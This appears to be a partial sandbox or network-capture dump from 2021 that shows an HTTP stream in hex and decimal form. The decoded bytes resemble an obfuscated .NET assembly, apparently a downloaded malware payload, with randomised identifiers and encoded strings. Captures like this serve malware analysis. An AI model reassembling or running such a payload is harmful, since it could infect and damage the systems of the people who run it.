                    2021-10-26 16:59:17 UTC655INData Raw: 20 35 33 20 31 34 30 20 31 31 20 31 36 33 20 34 20 31 34 31 20 31 31 32 20 31 30 20 32 35 33 20 37 33 20 31 35 34 20 38 38 20 31 32 20 31 35 38 20 31 33 33 20 36 39 20 39 37 20 32 30 33 20 32 33 32 20 31 31 37 20 39 35 20 32 35 32 20 36 37 20 39 37 20 32 33 39 20 31 30 36 20 31 37 35 20 31 32 33 20 31 32 34 20 38 36 20 31 39 34 20 33 38 20 31 38 38 20 32 36 20 31 34 33 20 31 39 35 20 31 39 31 20 31 33 34 20 32 34 34 20 34 36 20 34 32 20 31 33 20 31 36 20 31 39 34 20 31 34 36 20 32 32 36 20 31 35 30 20 32 35 34 20 37 37 20 31 32 20 31 33 34 20 31 33 39 20 32 30 33 20 38 30 20 31 38 38 20 31 34 35 20 31 35 34 20 32 30 31 20 32 34 38 20 31 31 37 20 31 31 33 20 33 37 20 31 39 20 38 39 20 35 32 20 31 34 30 20 32 34 39 20 31 32 35 20 32 35 20 31 36 32 20 31 31
                    Data Ascii: 53 140 11 163 4 141 112 10 253 73 154 88 12 158 133 69 97 203 232 117 95 252 67 97 239 106 175 123 124 86 194 38 188 26 143 195 191 134 244 46 42 13 16 194 146 226 150 254 77 12 134 139 203 80 188 145 154 201 248 117 113 37 19 89 52 140 249 125 25 162 11
                    2021-10-26 16:59:17 UTC671INData Raw: 20 31 32 33 20 39 31 20 31 33 32 20 31 33 30 20 35 34 20 31 35 35 20 32 33 38 20 31 39 39 20 32 35 34 20 31 33 36 20 31 30 33 20 33 31 20 38 39 20 31 30 32 20 31 38 36 20 32 35 33 20 32 33 33 20 32 33 35 20 31 39 35 20 31 31 39 20 31 35 31 20 36 32 20 31 31 37 20 31 33 38 20 35 30 20 39 36 20 34 30 20 32 35 30 20 32 33 30 20 39 36 20 31 33 35 20 35 35 20 31 39 39 20 32 33 39 20 32 33 37 20 31 33 32 20 32 34 37 20 31 35 36 20 31 32 33 20 32 35 34 20 31 34 35 20 31 34 30 20 31 35 31 20 38 38 20 38 31 20 31 31 30 20 32 33 33 20 31 32 36 20 32 32 30 20 39 35 20 37 36 20 36 32 20 31 30 37 20 35 34 20 32 33 39 20 31 36 37 20 36 39 20 35 37 20 32 35 32 20 34 39 20 32 34 31 20 32 33 30 20 31 33 33 20 33 34 20 31 31 33 20 31 33 34 20 35 20 31 31 31 20 32 31 35 20
                    Data Ascii: 123 91 132 130 54 155 238 199 254 136 103 31 89 102 186 253 233 235 195 119 151 62 117 138 50 96 40 250 230 96 135 55 199 239 237 132 247 156 123 254 145 140 151 88 81 110 233 126 220 95 76 62 107 54 239 167 69 57 252 49 241 230 133 34 113 134 5 111 215
                    2021-10-26 16:59:17 UTC687INData Raw: 34 36 20 32 33 35 20 31 32 37 20 32 30 32 20 32 34 37 20 38 38 20 38 37 20 31 31 32 20 31 36 35 20 35 34 20 31 38 38 20 32 35 20 35 36 20 39 39 20 31 30 38 20 31 32 32 20 32 31 37 20 32 31 20 31 33 39 20 33 33 20 36 34 20 32 30 36 20 31 31 37 20 31 38 37 20 34 20 31 31 37 20 32 31 37 20 32 34 37 20 39 39 20 30 20 32 32 35 20 31 30 32 20 32 30 38 20 31 37 37 20 31 39 39 20 39 33 20 31 31 35 20 31 37 20 31 32 30 20 31 34 20 33 33 20 32 31 32 20 32 31 20 37 30 20 31 37 20 31 31 35 20 31 32 39 20 31 33 39 20 31 30 39 20 32 31 37 20 32 37 20 31 35 38 20 32 33 33 20 34 37 20 37 39 20 31 38 37 20 35 38 20 32 34 34 20 31 34 20 31 37 30 20 31 34 33 20 31 36 35 20 31 32 34 20 33 36 20 35 36 20 32 31 34 20 36 39 20 31 33 20 35 31 20 32 34 30 20 31 35 32 20 31 38 39
                    Data Ascii: 46 235 127 202 247 88 87 112 165 54 188 25 56 99 108 122 217 21 139 33 64 206 117 187 4 117 217 247 99 0 225 102 208 177 199 93 115 17 120 14 33 212 21 70 17 115 129 139 109 217 27 158 233 47 79 187 58 244 14 170 143 165 124 36 56 214 69 13 51 240 152 189
                    2021-10-26 16:59:17 UTC703INData Raw: 31 32 20 31 20 30 20 35 37 20 36 20 30 20 30 20 30 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 34 32 20 31 20 31 36 20 30 20 30 20 31 20 30 20 36 20 30 20 31 39 30 20 32 33 30 20 30 20 31 35 20 31 39 36 20 30 20 30 20 30 20 32 37 20 34 38 20 31 31 20 30 20 39 35 20 32 20 30 20 30 20 33 32 20 30 20 30 20 31 37 20 31 34 30 20 39 30 20 30 20 30 20 31 20 30 20 30 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 33 32 20 32 35 34 20 32 35 35 20 32 35 35 20 32 35 35 20 32 35 34 20 31 34 20 31 20 30 20 33 32 20 32 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 39 20 31 20 30 20 34 30 20 39 37 20 30 20 30 20 36 20 30 20 33 32 20 33 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 34 30 20 38 37 20 30 20 30 20 31 30 20 34 30 20 39 37 20
                    Data Ascii: 12 1 0 57 6 0 0 0 40 55 0 0 10 0 42 1 16 0 0 1 0 6 0 190 230 0 15 196 0 0 0 27 48 11 0 95 2 0 0 32 0 0 17 140 90 0 0 1 0 0 40 55 0 0 10 0 32 254 255 255 255 254 14 1 0 32 2 0 0 0 254 14 3 0 254 9 1 0 40 97 0 0 6 0 32 3 0 0 0 254 14 3 0 40 87 0 0 10 40 97
                    2021-10-26 16:59:17 UTC719INData Raw: 31 31 34 20 31 33 32 20 36 20 34 20 31 31 32 20 31 31 34 20 32 35 34 20 35 20 34 20 31 31 32 20 34 30 20 31 31 31 20 30 20 30 20 36 20 31 31 34 20 30 20 36 20 34 20 31 31 32 20 33 32 20 30 20 30 20 30 20 30 20 34 30 20 38 36 20 30 20 30 20 31 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 32 35 34 20 31 34 20 31 32 20 30 20 32 35 34 20 31 32 20 31 32 20 30 20 35 37 20 32 34 20 30 20 30 20 30 20 33 32 20 32 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 30 20 30 20 35 36 20 33 36 20 36 20 30 20 30 20 30 20 30 20 33 32 20 32 33 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 31 31 34 20 32 30 32 20 36 20 34 20 31 31 32 20 31 31 34 20 32 34 34 20 34 20 34 20 31 31 32 20 34 30 20
                    Data Ascii: 114 132 6 4 112 114 254 5 4 112 40 111 0 0 6 114 0 6 4 112 32 0 0 0 0 40 86 0 0 10 32 0 0 0 0 254 1 254 14 12 0 254 12 12 0 57 24 0 0 0 32 21 0 0 0 254 14 3 0 32 1 0 0 0 254 14 0 0 56 36 6 0 0 0 0 32 23 0 0 0 254 14 3 0 114 202 6 4 112 114 244 4 4 112 40
                    2021-10-26 16:59:17 UTC735INData Raw: 30 20 30 20 31 20 32 30 20 32 35 34 20 33 20 36 20 32 32 20 32 35 34 20 33 20 39 35 20 37 20 32 32 20 32 35 34 20 31 20 39 35 20 32 35 34 20 31 37 20 31 31 36 20 33 31 20 30 20 30 20 31 20 34 30 20 35 33 20 30 20 30 20 31 30 20 32 32 32 20 31 39 38 20 33 32 20 35 31 20 30 20 31 30 20 31 32 38 20 34 30 20 36 34 20 30 20 30 20 31 30 20 31 32 32 20 37 20 34 34 20 36 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 34 32 20 30 20 31 20 31 36 20 30 20 30 20 31 20 30 20 31 20 30 20 32 32 39 20 32 35 30 20 30 20 31 32 20 32 33 30 20 30 20 30 20 30 20 32 37 20 34 38 20 34 20 30 20 31 33 37 20 30 20 30 20 30 20 31 30 20 30 20 30 20 31 37 20 30 20 30 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 33 31 20 32 35 34 20 31 30 20 32 34 20 31 32 20 32 20 33 31 20 31 37
                    Data Ascii: 0 0 1 20 254 3 6 22 254 3 95 7 22 254 1 95 254 17 116 31 0 0 1 40 53 0 0 10 222 198 32 51 0 10 128 40 64 0 0 10 122 7 44 6 40 55 0 0 10 0 42 0 1 16 0 0 1 0 1 0 229 250 0 12 230 0 0 0 27 48 4 0 137 0 0 0 10 0 0 17 0 0 40 55 0 0 10 0 31 254 10 24 12 2 31 17
                    2021-10-26 16:59:17 UTC751INData Raw: 34 38 20 31 35 37 20 33 37 20 33 32 20 39 20 30 20 30 20 30 20 33 31 20 31 30 32 20 31 35 37 20 33 37 20 33 32 20 39 20 30 20 30 20 30 20 33 31 20 35 32 20 31 35 37 20 33 37 20 33 31 20 39 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 38 20 30 20 30 20 30 20 33 31 20 35 32 20 31 35 37 20 33 37 20 33 32 20 38 20 30 20 30 20 30 20 33 31 20 39 38 20 31 35 37 20 33 37 20 33 32 20 38 20 30 20 30 20 30 20 33 31 20 35 33 20 31 35 37 20 33 37 20 33 32 20 38 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 30 20 33 31 20 39 39 20 31 35 37 20 33 37 20 33 32 20 37 20 30 20 30 20 30 20 33 31 20 35 31 20 31 35 37 20 33 37 20 33 32 20 37 20 30 20 30 20 30 20 33 31 20 39 37 20 31 35 37 20 33 37 20 33 32 20 37 20 30 20 30 20 30 20 33 31 20 35 31
                    Data Ascii: 48 157 37 32 9 0 0 0 31 102 157 37 32 9 0 0 0 31 52 157 37 31 9 31 101 157 37 32 8 0 0 0 31 52 157 37 32 8 0 0 0 31 98 157 37 32 8 0 0 0 31 53 157 37 32 8 0 0 0 31 101 157 37 30 31 99 157 37 32 7 0 0 0 31 51 157 37 32 7 0 0 0 31 97 157 37 32 7 0 0 0 31 51
                    2021-10-26 16:59:17 UTC767INData Raw: 20 31 30 20 31 32 32 20 32 35 34 20 31 32 20 32 20 30 20 35 37 20 36 20 30 20 30 20 30 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 32 35 34 20 31 32 20 30 20 30 20 34 32 20 36 35 20 32 38 20 30 20 30 20 31 20 30 20 30 20 30 20 36 20 30 20 30 20 30 20 32 35 30 20 32 20 30 20 30 20 33 34 20 33 20 30 20 30 20 31 35 20 30 20 30 20 30 20 30 20 33 20 30 20 30 20 32 37 20 34 38 20 31 31 20 30 20 31 30 37 20 32 20 30 20 30 20 34 35 20 30 20 30 20 31 37 20 31 34 30 20 39 30 20 30 20 30 20 31 20 30 20 30 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 33 32 20 32 35 34 20 32 35 35 20 32 35 35 20 32 35 35 20 32 35 34 20 31 34 20 31 20 30 20 33 32 20 32 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 39 20 30 20 30 20 34 30 20 32 30 36 20 30 20
                    Data Ascii: 10 122 254 12 2 0 57 6 0 0 0 40 55 0 0 10 0 254 12 0 0 42 65 28 0 0 1 0 0 0 6 0 0 0 250 2 0 0 34 3 0 0 15 0 0 0 0 3 0 0 27 48 11 0 107 2 0 0 45 0 0 17 140 90 0 0 1 0 0 40 55 0 0 10 0 32 254 255 255 255 254 14 1 0 32 2 0 0 0 254 14 3 0 254 9 0 0 40 206 0
                    2021-10-26 16:59:17 UTC783INData Raw: 20 33 20 38 37 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 31 33 30 20 31 38 32 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 31 32 39 20 31 34 36 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 31 33 31 20 31 31 34 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 39 36 20 31 33 39 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 34 39 20 31 37 38 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 31 36 20 31 37 31 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 31 31 20 39 32 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 36 31 20 31 32 32 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 34 20 31 35 33 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 39 35 20 31 32 36 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 31 37 30 20 31 35 38 20 31 36 35 20 31 32 20 38 36 20 31 32
                    Data Ascii: 3 87 165 12 86 128 130 182 165 12 86 128 129 146 165 12 86 128 131 114 165 12 86 128 96 139 165 12 86 128 249 178 165 12 86 128 216 171 165 12 86 128 211 92 165 12 86 128 61 122 165 12 86 128 24 153 165 12 86 128 95 126 165 12 86 128 170 158 165 12 86 12
                    2021-10-26 16:59:17 UTC799INData Raw: 31 20 31 20 32 33 37 20 35 34 20 38 30 20 31 20 31 20 31 20 31 32 34 20 36 30 20 31 30 31 20 31 20 31 20 31 20 39 34 20 35 36 20 31 30 37 20 31 20 32 33 33 20 31 20 38 32 20 35 35 20 31 31 33 20 31 20 39 20 31 20 31 35 20 36 34 20 31 31 39 20 31 20 31 37 20 31 20 31 32 37 20 36 20 36 31 20 31 20 31 35 33 20 31 20 33 36 20 37 30 20 31 32 33 20 31 20 39 20 31 20 32 37 20 36 36 20 31 32 39 20 31 20 32 34 31 20 31 20 31 37 37 20 31 39 20 36 20 30 20 32 34 39 20 31 20 39 30 20 32 36 20 36 31 20 31 20 32 34 39 20 31 20 31 35 34 20 32 38 20 31 34 38 20 31 20 31 20 32 20 31 30 36 20 35 35 20 36 20 30 20 32 35 20 31 20 31 30 36 20 35 35 20 31 34 38 20 31 20 32 35 20 31 20 31 33 39 20 32 37 20 31 38 33 20 31 20 31 37 20 32 20 31 30 36 20 35 35 20 31 38 39 20 31 20
                    Data Ascii: 1 1 237 54 80 1 1 1 124 60 101 1 1 1 94 56 107 1 233 1 82 55 113 1 9 1 15 64 119 1 17 1 127 6 61 1 153 1 36 70 123 1 9 1 27 66 129 1 241 1 177 19 6 0 249 1 90 26 61 1 249 1 154 28 148 1 1 2 106 55 6 0 25 1 106 55 148 1 25 1 139 27 183 1 17 2 106 55 189 1
                    2021-10-26 16:59:17 UTC815INData Raw: 31 30 39 20 31 30 31 20 31 31 36 20 31 30 31 20 31 31 34 20 35 30 20 30 20 36 35 20 39 38 20 39 37 20 31 31 30 20 31 30 30 20 31 31 31 20 31 31 30 20 31 30 31 20 31 30 30 20 38 37 20 39 37 20 31 30 35 20 31 31 36 20 35 30 20 30 20 36 35 20 39 38 20 39 37 20 31 31 30 20 31 30 30 20 31 31 31 20 31 31 30 20 31 30 31 20 31 30 30 20 38 37 20 39 37 20 31 30 35 20 31 31 36 20 35 34 20 35 31 20 30 20 37 33 20 31 31 30 20 31 31 38 20 39 37 20 31 30 38 20 31 30 35 20 31 30 30 20 38 30 20 39 37 20 31 31 34 20 39 37 20 31 30 39 20 31 30 31 20 31 31 36 20 31 30 31 20 31 31 34 20 35 31 20 30 20 36 35 20 39 38 20 39 37 20 31 31 30 20 31 30 30 20 31 31 31 20 31 31 30 20 31 30 31 20 31 30 30 20 38 37 20 39 37 20 31 30 35 20 31 31 36 20 35 31 20 30 20 37 33 20 31 31 30 20
                    Data Ascii: 109 101 116 101 114 50 0 65 98 97 110 100 111 110 101 100 87 97 105 116 50 0 65 98 97 110 100 111 110 101 100 87 97 105 116 54 51 0 73 110 118 97 108 105 100 80 97 114 97 109 101 116 101 114 51 0 65 98 97 110 100 111 110 101 100 87 97 105 116 51 0 73 110
                    2021-10-26 16:59:17 UTC831INData Raw: 20 36 36 20 39 37 20 31 31 35 20 31 30 31 20 30 20 38 32 20 31 30 31 20 39 37 20 31 30 30 20 37 39 20 31 31 30 20 31 30 38 20 31 32 31 20 36 37 20 31 31 31 20 31 30 38 20 31 30 38 20 31 30 31 20 39 39 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 36 36 20 39 37 20 31 31 35 20 31 30 31 20 30 20 37 33 20 31 30 39 20 39 37 20 31 30 33 20 31 30 31 20 37 38 20 31 31 31 20 31 31 36 20 36 35 20 31 31 36 20 36 36 20 39 37 20 31 31 35 20 31 30 31 20 30 20 36 38 20 31 30 35 20 31 31 35 20 31 31 32 20 31 31 31 20 31 31 35 20 31 30 31 20 30 20 38 32 20 31 30 31 20 31 31 32 20 39 37 20 31 31 34 20 31 31 35 20 31 30 31 20 30 20 36 38 20 39 37 20 31 31 36 20 39 37 20 37 36 20 39 37 20 31 31 36 20 31 30 31 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30
                    Data Ascii: 66 97 115 101 0 82 101 97 100 79 110 108 121 67 111 108 108 101 99 116 105 111 110 66 97 115 101 0 73 109 97 103 101 78 111 116 65 116 66 97 115 101 0 68 105 115 112 111 115 101 0 82 101 112 97 114 115 101 0 68 97 116 97 76 97 116 101 0 83 121 115 116 10
                    2021-10-26 16:59:17 UTC847INData Raw: 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 38 33 20 31 31 37 20 31 31 32 20 31 30 31 20 31 31 34 20 31 30 32 20 31 30 31 20 31 31 36 20 39 39 20 31 30 34 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 36 37 20 31 31 31 20 31 31 30 20 31 31 36 20 31 30 31 20 31 32 30 20 31 31 36 20 38 33 20 31 31 39 20 31 30 35 20 31 31 36 20 39 39 20 31 30 34 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 38 30 20 39 37 20 31 31 36 20 31 30 34 20 37 33
                    Data Ascii: 1 115 116 101 109 83 117 112 101 114 102 101 116 99 104 73 110 102 111 114 109 97 116 105 111 110 0 83 121 115 116 101 109 67 111 110 116 101 120 116 83 119 105 116 99 104 73 110 102 111 114 109 97 116 105 111 110 0 83 121 115 116 101 109 80 97 116 104 73
                    2021-10-26 16:59:17 UTC863INData Raw: 20 31 31 31 20 31 30 35 20 31 31 30 20 31 31 36 20 31 30 31 20 31 31 34 20 30 20 36 36 20 31 30 35 20 31 31 36 20 36 37 20 31 31 31 20 31 31 30 20 31 31 38 20 31 30 31 20 31 31 34 20 31 31 36 20 31 30 31 20 31 31 34 20 30 20 31 30 33 20 31 30 31 20 31 31 36 20 39 35 20 36 37 20 31 31 31 20 31 30 39 20 31 31 32 20 31 31 37 20 31 31 36 20 31 30 31 20 31 31 34 20 30 20 37 37 20 31 32 31 20 36 37 20 31 31 31 20 31 30 39 20 31 31 32 20 31 31 37 20 31 31 36 20 31 30 31 20 31 31 34 20 30 20 37 36 20 31 31 31 20 31 30 33 20 31 31 31 20 31 31 30 20 38 33 20 31 30 31 20 31 31 34 20 31 31 38 20 31 30 31 20 31 31 34 20 30 20 38 34 20 31 31 31 20 37 36 20 31 31 31 20 31 31 39 20 31 30 31 20 31 31 34 20 30 20 37 38 20 31 31 31 20 31 31 36 20 31 30 35 20 31 30 32 20 31
                    Data Ascii: 111 105 110 116 101 114 0 66 105 116 67 111 110 118 101 114 116 101 114 0 103 101 116 95 67 111 109 112 117 116 101 114 0 77 121 67 111 109 112 117 116 101 114 0 76 111 103 111 110 83 101 114 118 101 114 0 84 111 76 111 119 101 114 0 78 111 116 105 102 1
                    2021-10-26 16:59:17 UTC879INData Raw: 30 20 39 35 20 39 35 20 39 35 20 37 35 20 38 33 20 35 35 20 35 32 20 35 32 20 31 30 32 20 37 34 20 35 34 20 35 36 20 31 30 32 20 31 31 33 20 35 32 20 38 31 20 38 39 20 35 31 20 30 20 31 30 33 20 31 30 31 20 31 31 36 20 39 35 20 38 37 20 38 33 20 31 31 32 20 39 39 20 31 30 31 20 35 37 20 35 32 20 34 39 20 31 32 30 20 35 31 20 38 36 20 35 36 20 31 30 32 20 35 31 20 30 20 31 31 35 20 31 30 31 20 31 31 36 20 39 35 20 38 37 20 38 33 20 31 31 32 20 39 39 20 31 30 31 20 35 37 20 35 32 20 34 39 20 31 32 30 20 35 31 20 38 36 20 35 36 20 31 30 32 20 35 31 20 30 20 39 35 20 39 35 20 39 35 20 36 35 20 31 30 30 20 35 36 20 39 38 20 39 38 20 31 30 30 20 34 39 20 35 34 20 35 30 20 37 35 20 35 31 20 31 32 32 20 31 31 36 20 35 31 20 30 20 37 30 20 31 31 37 20 31 31 30 20
                    Data Ascii: 0 95 95 95 75 83 55 52 52 102 74 54 56 102 113 52 81 89 51 0 103 101 116 95 87 83 112 99 101 57 52 49 120 51 86 56 102 51 0 115 101 116 95 87 83 112 99 101 57 52 49 120 51 86 56 102 51 0 95 95 95 65 100 56 98 98 100 49 54 50 75 51 122 116 51 0 70 117 110
                    2021-10-26 16:59:17 UTC895INData Raw: 20 31 36 34 20 32 33 34 20 31 38 38 20 31 35 35 20 32 33 34 20 31 38 37 20 31 37 31 20 32 33 34 20 31 38 37 20 31 38 38 20 32 33 34 20 31 38 38 20 31 35 38 20 32 33 34 20 31 38 38 20 31 32 39 20 30 20 32 33 33 20 31 33 35 20 31 37 36 20 32 33 33 20 31 33 35 20 31 37 32 20 32 33 33 20 31 33 36 20 31 35 36 20 32 33 33 20 31 33 35 20 31 37 32 20 32 33 33 20 31 33 36 20 31 35 39 20 32 33 33 20 31 33 36 20 31 35 36 20 32 33 33 20 31 33 35 20 31 37 38 20 32 33 33 20 31 33 35 20 31 37 35 20 32 33 33 20 31 33 36 20 31 36 39 20 32 33 33 20 31 33 36 20 31 35 35 20 32 33 33 20 31 33 36 20 31 34 38 20 32 33 33 20 31 33 36 20 31 37 30 20 32 33 33 20 31 33 36 20 31 35 38 20 32 33 33 20 31 33 36 20 31 35 38 20 32 33 33 20 31 33 36 20 31 33 30 20 30 20 32 33 31 20 31 34
                    Data Ascii: 164 234 188 155 234 187 171 234 187 188 234 188 158 234 188 129 0 233 135 176 233 135 172 233 136 156 233 135 172 233 136 159 233 136 156 233 135 178 233 135 175 233 136 169 233 136 155 233 136 148 233 136 170 233 136 158 233 136 158 233 136 130 0 231 14
                    2021-10-26 16:59:17 UTC911INData Raw: 33 37 20 32 33 30 20 31 37 39 20 31 33 39 20 32 33 30 20 31 38 30 20 31 32 39 20 32 33 30 20 31 38 30 20 31 32 38 20 32 33 30 20 31 37 39 20 31 34 31 20 32 33 30 20 31 38 30 20 31 33 34 20 32 33 30 20 31 37 39 20 31 33 36 20 32 33 30 20 31 37 39 20 31 38 32 20 32 33 30 20 31 37 39 20 31 37 35 20 32 33 30 20 31 37 39 20 31 34 30 20 32 33 30 20 31 37 39 20 31 33 37 20 30 20 32 33 35 20 31 38 32 20 31 33 33 20 32 33 35 20 31 38 31 20 31 38 30 20 32 33 35 20 31 38 31 20 31 38 30 20 32 33 35 20 31 38 31 20 31 38 31 20 32 33 35 20 31 38 32 20 31 38 30 20 32 33 35 20 31 38 31 20 31 37 38 20 32 33 35 20 31 38 32 20 31 35 38 20 32 33 35 20 31 38 31 20 31 38 30 20 32 33 35 20 31 38 31 20 31 37 39 20 32 33 35 20 31 38 32 20 31 38 30 20 32 33 35 20 31 38 32 20 31 36
                    Data Ascii: 37 230 179 139 230 180 129 230 180 128 230 179 141 230 180 134 230 179 136 230 179 182 230 179 175 230 179 140 230 179 137 0 235 182 133 235 181 180 235 181 180 235 181 181 235 182 180 235 181 178 235 182 158 235 181 180 235 181 179 235 182 180 235 182 16
                    2021-10-26 16:59:17 UTC927INData Raw: 20 32 33 31 20 31 36 30 20 31 34 33 20 32 33 31 20 31 36 30 20 31 39 30 20 32 33 31 20 31 36 30 20 31 34 33 20 32 33 31 20 31 36 30 20 31 34 32 20 32 33 31 20 31 36 30 20 31 34 36 20 32 33 31 20 31 36 30 20 31 35 39 20 32 33 31 20 31 36 30 20 31 34 38 20 32 33 31 20 31 36 30 20 31 39 30 20 32 33 31 20 31 36 31 20 31 34 30 20 32 33 31 20 31 36 30 20 31 34 34 20 30 20 32 33 35 20 31 36 35 20 31 38 38 20 32 33 35 20 31 36 35 20 31 38 39 20 32 33 35 20 31 36 35 20 31 38 37 20 32 33 35 20 31 36 35 20 31 34 31 20 32 33 35 20 31 36 35 20 31 34 31 20 32 33 35 20 31 36 35 20 31 38 35 20 32 33 35 20 31 36 35 20 31 36 32 20 32 33 35 20 31 36 35 20 31 37 34 20 32 33 35 20 31 36 35 20 31 34 30 20 32 33 35 20 31 36 35 20 31 38 38 20 32 33 35 20 31 36 36 20 31 34 32 20
                    Data Ascii: 231 160 143 231 160 190 231 160 143 231 160 142 231 160 146 231 160 159 231 160 148 231 160 190 231 161 140 231 160 144 0 235 165 188 235 165 189 235 165 187 235 165 141 235 165 141 235 165 185 235 165 162 235 165 174 235 165 140 235 165 188 235 166 142
                    2021-10-26 16:59:17 UTC943INData Raw: 32 36 20 31 37 33 20 31 33 35 20 32 32 36 20 31 37 32 20 31 35 34 20 32 32 36 20 31 37 33 20 31 33 33 20 32 32 36 20 31 37 33 20 31 35 32 20 32 32 36 20 31 37 33 20 31 33 34 20 32 32 36 20 31 37 32 20 31 35 30 20 32 32 36 20 31 37 32 20 31 35 30 20 32 32 36 20 31 37 33 20 31 34 30 20 32 32 36 20 31 37 32 20 31 35 36 20 32 32 36 20 31 37 32 20 31 35 31 20 30 20 32 33 33 20 31 37 36 20 31 33 32 20 32 33 33 20 31 37 36 20 31 37 37 20 32 33 33 20 31 37 36 20 31 33 35 20 32 33 33 20 31 37 36 20 31 33 31 20 32 33 33 20 31 37 36 20 31 38 38 20 32 33 33 20 31 37 37 20 31 33 33 20 32 33 33 20 31 37 36 20 31 35 36 20 32 33 33 20 31 37 36 20 31 33 36 20 32 33 33 20 31 37 36 20 31 36 31 20 32 33 33 20 31 37 36 20 31 36 33 20 32 33 33 20 31 37 36 20 31 33 33 20 32 33
                    Data Ascii: 26 173 135 226 172 154 226 173 133 226 173 152 226 173 134 226 172 150 226 172 150 226 173 140 226 172 156 226 172 151 0 233 176 132 233 176 177 233 176 135 233 176 131 233 176 188 233 177 133 233 176 156 233 176 136 233 176 161 233 176 163 233 176 133 23
                    2021-10-26 16:59:17 UTC944INData Raw: 37 20 31 35 32 20 32 33 30 20 31 37 36 20 31 38 31 20 32 33 30 20 31 37 36 20 31 36 39 20 32 33 30 20 31 37 37 20 31 35 31 20 32 33 30 20 31 37 37 20 31 35 30 20 32 33 30 20 31 37 37 20 31 33 36 20 32 33 30 20 31 37 37 20 31 33 31 20 32 33 30 20 31 37 37 20 31 35 32 20 32 33 30 20 31 37 36 20 31 36 39 20 32 33 30 20 31 37 36 20 31 36 34 20 32 33 30 20 31 37 37 20 31 35 31 20 30 20 32 33 30 20 31 38 39 20 31 34 36 20 32 33 30 20 31 38 38 20 31 37 30 20 32 33 30 20 31 38 38 20 31 37 39 20 32 33 30 20 31 38 39 20 31 35 31 20 32 33 30 20 31 38 39 20 31 33 33 20 32 33 30 20 31 38 39 20 31 35 30 20 32 33 30 20 31 38 39 20 31 37 31 20 32 33 30 20 31 38 39 20 31 33 30 20 32 33 30 20 31 38 38 20 31 36 33 20 32 33 30 20 31 38 38 20 31 36 33 20 32 33 30 20 31 38 39
                    Data Ascii: 7 152 230 176 181 230 176 169 230 177 151 230 177 150 230 177 136 230 177 131 230 177 152 230 176 169 230 176 164 230 177 151 0 230 189 146 230 188 170 230 188 179 230 189 151 230 189 133 230 189 150 230 189 171 230 189 130 230 188 163 230 188 163 230 189
                    2021-10-26 16:59:17 UTC960INData Raw: 31 38 35 20 32 32 36 20 31 38 37 20 31 33 33 20 32 32 36 20 31 38 36 20 31 34 31 20 32 32 36 20 31 38 36 20 31 38 35 20 32 32 36 20 31 38 36 20 31 34 30 20 32 32 36 20 31 38 36 20 31 35 38 20 30 20 32 32 39 20 31 38 38 20 31 34 33 20 32 32 39 20 31 38 38 20 31 34 30 20 32 32 39 20 31 38 38 20 31 36 31 20 32 32 39 20 31 38 38 20 31 34 32 20 32 32 39 20 31 38 37 20 31 35 37 20 32 32 39 20 31 38 38 20 31 34 35 20 32 32 39 20 31 38 37 20 31 35 37 20 32 32 39 20 31 38 37 20 31 35 35 20 32 32 39 20 31 38 38 20 31 34 35 20 32 32 39 20 31 38 37 20 31 35 35 20 32 32 39 20 31 38 37 20 31 38 35 20 32 32 39 20 31 38 37 20 31 36 33 20 32 32 39 20 31 38 38 20 31 34 34 20 32 32 39 20 31 38 37 20 31 36 33 20 32 32 39 20 31 38 37 20 31 35 38 20 30 20 32 33 32 20 31 38 38
                    Data Ascii: 185 226 187 133 226 186 141 226 186 185 226 186 140 226 186 158 0 229 188 143 229 188 140 229 188 161 229 188 142 229 187 157 229 188 145 229 187 157 229 187 155 229 188 145 229 187 155 229 187 185 229 187 163 229 188 144 229 187 163 229 187 158 0 232 188
